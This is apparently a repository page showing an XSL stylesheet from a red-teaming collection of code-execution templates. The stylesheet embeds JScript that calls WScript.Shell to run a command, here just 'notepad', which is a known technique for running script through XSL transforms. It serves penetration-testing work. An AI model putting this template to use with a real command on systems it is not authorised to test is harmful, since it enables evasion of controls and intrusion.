mgeeky-Penetration-Testing-.../red-teaming/code-exec-templates/wscript-shell-run-jscript-x...

14 lines
383 B
XML
Raw Normal View History

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var command = "notepad";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]> </ms:script>
2020-05-06 19:22:32 +02:00
</stylesheet>